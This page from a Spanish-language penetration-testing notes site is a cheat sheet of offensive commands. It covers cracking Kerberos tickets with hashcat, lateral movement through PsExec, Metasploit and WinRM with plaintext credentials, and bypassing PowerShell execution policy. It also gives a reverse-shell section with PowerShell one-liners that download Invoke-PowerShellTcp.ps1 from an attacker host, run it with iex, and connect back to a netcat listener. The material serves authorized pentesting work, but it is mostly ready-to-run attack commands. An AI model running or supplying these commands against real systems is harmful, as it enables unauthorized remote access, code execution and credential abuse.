Grimorio de XTORMIN
Xtormin GithubLinkedIn
  • Home
  • 🧠IA / AI
    • Investigación y automatización
    • IA en local
    • Plantillas de prompts
      • Informes de pentesting
  • 🏢Pentesting en Infraestructuras
    • Intrusión física
    • Redes Wi-Fi
      • Herramientas
      • Metodología de Pentest Wifi
      • WEP
      • WPA2-PSK / Red personal
      • WPA2-MGT / Red corporativa
    • Cloud
      • 🔷Azure
        • Herramientas
        • Metodología de Azure Pentest
        • AzureAD
        • Az Powershell
        • Az Cli
        • Portal de Azure
    • Perímetro
      • Acceso remoto
    • Red interna
      • Windows
      • Active directory
        • Enumeración manual
    • Servicios
      • FTP - 21/tcp
      • SSH - 22/tcp
      • DNS - 53/UDP
      • SMB - 135, 445 /tcp
      • SNMP - 161, 162, 10161, 10162/udp
      • IPMI - 623/udp/tcp
      • RDP - 3389/TCP
      • Redis - 6379/tcp
    • Misc
      • Transferencia de ficheros
  • 🌐Pentesting en aplicaciones web
    • General
      • Ataques y vulnerabilidades
        • Autenticación
          • Vulnerabilidades JWT
        • Javascript
          • XSS
          • Contaminación de prototipos - Prototype pollution
        • GraphQL
      • Explotación
        • Webshell
    • Tecnología
      • Jenkins
      • Salesforce
  • ⚒️Herramientas comunes
    • Recursos generales
    • Nmap
    • Nuclei
    • BloodHound
  • 👾MISC
    • [ Kali ] Setup
      • VPN
Con tecnología de GitBook
En esta página
  • Cracking
  • Ticket de kerberos
  • Conexión remota
  • Windows
  • Linux
  • Habilitar ejecución de scripts
  • Reverse shell
  • Agregar excepción en el firewall

¿Te fue útil?

  1. Pentesting en Infraestructuras

Misc

AnteriorRedis - 6379/tcpSiguienteTransferencia de ficheros

Última actualización hace 1 mes

¿Te fue útil?

Cracking

Ticket de kerberos

hashcat -m 18200 hash/svc-test.hc18200 /usr/share/wordlists/rockyou.txt --force

Conexión remota

Windows

Runas

runas /user:xtormincorp\usuario powershell.exe

PSExec

Puerto

445/tcp (SMB)

Grupo requerido

Administradores

Herramienta de Sysinternals:

psexec64.exe \\MACHINE_IP -u Administrator -p <password> -i cmd.exe

Metasploit:

use exploit/windows/smb/psexec
set RHOSTS file:/home/kali/scope.txt
set smbuser xtormin
set smbpass password123
exploit
psexec -i -s powershell.exe # Ejecución de consola interactiva con el usuario actual

WinRM

Puerto

5985/tcp (WinRM HTTP)

5986/tcp (WinRM HTTPS)

Grupo requerido

Remote Management Users

CMD:

winrs.exe -u:Administrator -p:Mypass123 -r:target cmd

PowerShell:

Primero se debe crear un objeto PSCredential con las credenciales del usuario:

$username = 'Administrator';
$password = 'Mypass123';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force; 
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
  • Crear sesión activa:

Enter-PSSession -Computername TARGET -Credential $credential
  • Ejecutar ScriptBlocks vía WinRM:

Invoke-Command -Computername TARGET -Credential $credential -ScriptBlock {whoami}

Netexec

IP='10.10.10.100'
USER='xtormin'
PASS='password123'
netexec winrm $IP -u $USER -p $PASS

Linux

evil-winrm -i 192.168.1.100 -u <usuario> -p <contraseña>

Habilitar ejecución de scripts

El siguiente comando permite modificar la política de PowerShell de forma que se permita la ejecución de todos los scripts sin firmar y sin aplicar restricciones ni advertencias (-exec bypass). Además, no se carga el perfil del usuario, lo que permite evadir posibles restricciones (-nop).

powershell -nop -exec bypass

Reverse shell

Desde la máquina atacante:

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Desde la máquina víctima:

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http://192.168.1.100/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 192.168.1.100 -Port 443

powershell.exe iex (iwr http://192.168.1.100/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 192.168.1.100 -Port 443

Agregar excepción en el firewall

🏢
https://learn.microsoft.com/es-es/sysinternals/downloads/psexec